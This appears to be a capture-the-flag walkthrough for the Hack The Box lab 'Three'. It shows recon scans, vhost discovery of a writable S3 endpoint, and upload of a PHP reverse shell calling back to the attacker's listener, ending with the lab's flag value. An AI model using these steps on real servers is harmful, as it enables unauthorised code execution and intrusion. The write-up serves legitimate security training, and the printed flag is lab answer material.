Three
Port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon three.htb
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-09 07:18 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:18
Completed NSE at 07:18, 0.00s elapsed
Initiating Ping Scan at 07:18
Scanning three.htb (10.129.67.204) [4 ports]
Completed Ping Scan at 07:18, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:18
Scanning three.htb (10.129.67.204) [65535 ports]
Discovered open port 80/tcp on 10.129.67.204
Discovered open port 22/tcp on 10.129.67.204
Completed SYN Stealth Scan at 07:18, 15.39s elapsed (65535 total ports)
NSE: Script scanning 10.129.67.204.
Initiating NSE at 07:18
Completed NSE at 07:18, 0.00s elapsed
Nmap scan report for three.htb (10.129.67.204)
Host is up (0.070s latency).
Not shown: 63274 closed tcp ports (reset), 2259 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
NSE: Script Post-scanning.
Initiating NSE at 07:18
Completed NSE at 07:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.87 seconds
Raw packets sent: 76595 (3.370MB) | Rcvd: 66674 (2.667MB)
[i] [Server info]
http://three.htb:80 [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], Email[mail@thetoppers.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.129.67.204], Script, Title[The Toppers]
[+] [fuzzin server]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Aug 9 07:18:43 2022
URL_BASE: http://three.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://three.htb:80/ ----
==> DIRECTORY: http://three.htb:80/images/
+ http://three.htb:80/index.php (CODE:200|SIZE:11952)
+ http://three.htb:80/server-status (CODE:403|SIZE:274)
-----------------
END_TIME: Tue Aug 9 07:24:15 2022
DOWNLOADED: 4612 - FOUND: 2
recon reports two ports 22 for ssh and 80 for http
Inside Contact we found a new domain
┌──(root@ghost)-[/home/ghost]
└─# gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://thetoppers.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/08/09 07:41:06 Starting gobuster in VHOST enumeration mode
===============================================================
Found: s3.thetoppers.htb (Status: 502) [Size: 424]
Found: gc._msdcs.thetoppers.htb (Status: 400) [Size: 306]
===============================================================
2022/08/09 07:41:59 Finished
===============================================================
More dns enumeration two domains obtained, after a bit research on the internet we found more information about s3
┌──(root@ghost)-[/home/ghost]
└─# recon s3.thetoppers.htb
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-09 07:45 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.00s elapsed
Initiating Ping Scan at 07:45
Scanning s3.thetoppers.htb (10.129.67.204) [4 ports]
Completed Ping Scan at 07:45, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:45
Scanning s3.thetoppers.htb (10.129.67.204) [65535 ports]
Discovered open port 80/tcp on 10.129.67.204
Discovered open port 22/tcp on 10.129.67.204
Completed SYN Stealth Scan at 07:45, 14.59s elapsed (65535 total ports)
NSE: Script scanning 10.129.67.204.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.00s elapsed
Nmap scan report for s3.thetoppers.htb (10.129.67.204)
Host is up (0.088s latency).
rDNS record for 10.129.67.204: three.htb
Not shown: 63546 closed tcp ports (reset), 1987 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
NSE: Script Post-scanning.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.02 seconds
Raw packets sent: 72204 (3.177MB) | Rcvd: 64950 (2.598MB)
[i] [Server info]
http://s3.thetoppers.htb:80 [404 Not Found] Access-Control-Allow-Methods[HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH], Country[RESERVED][ZZ], HTTPServer[hypercorn-h11], IP[10.129.67.204], UncommonHeaders[access-control-allow-origin,access-control-allow-methods,access-control-allow-headers,access-control-expose-headers]
[+] [fuzzin server]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Aug 9 07:45:47 2022
URL_BASE: http://s3.thetoppers.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://s3.thetoppers.htb:80/ ----
+ http://s3.thetoppers.htb:80/graph (CODE:405|SIZE:178)
+ http://s3.thetoppers.htb:80/health (CODE:200|SIZE:888)
+ http://s3.thetoppers.htb:80/server-status (CODE:403|SIZE:282)
-----------------
END_TIME: Tue Aug 9 07:53:30 2022
DOWNLOADED: 4612 - FOUND: 3
At this point we can try connect to this with awscli, run aws configure and then you can list
┌──(root@ghost)-[/home/ghost]
└─# aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
PRE images/
2022-08-09 10:33:25 0 .htaccess
2022-08-09 10:33:25 11952 index.php
We can upload a php file so let's try upload our favourite shell
┌──(root@ghost)-[/home/ghost]
└─# shellstorm.sh php-daemon 10.10.15.252 1337 > rev.php
Generating reverse shell
┌──(root@ghost)-[/home/ghost]
└─# aws --endpoint=http://s3.thetoppers.htb s3 cp rev.php s3://thetoppers.htb
upload: ./rev.php to s3://thetoppers.htb/rev.php
Uploading our shell
Time to start netcat listener and curl where our rev.php was uploaded in http://thetoppers.htb/rev.php
┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.15.252] from three.htb [10.129.227.248] 57930
Linux three 4.15.0-189-generic #200-Ubuntu SMP Wed Jun 22 19:53:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
14:40:45 up 9 min, 0 users, load average: 0.02, 0.09, 0.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls -la /var/www/
total 16
drwxr-xr-x 3 root root 4096 Jul 19 11:30 .
drwxr-xr-x 13 root root 4096 Jul 19 11:57 ..
-rw-r----- 1 root www-data 33 Jul 19 11:30 flag.txt
drwxr-xr-x 3 root root 4096 Aug 9 14:38 html
$ cat /var/www/flag.txt
a980d99281a28d638ac68b9bf9453c2b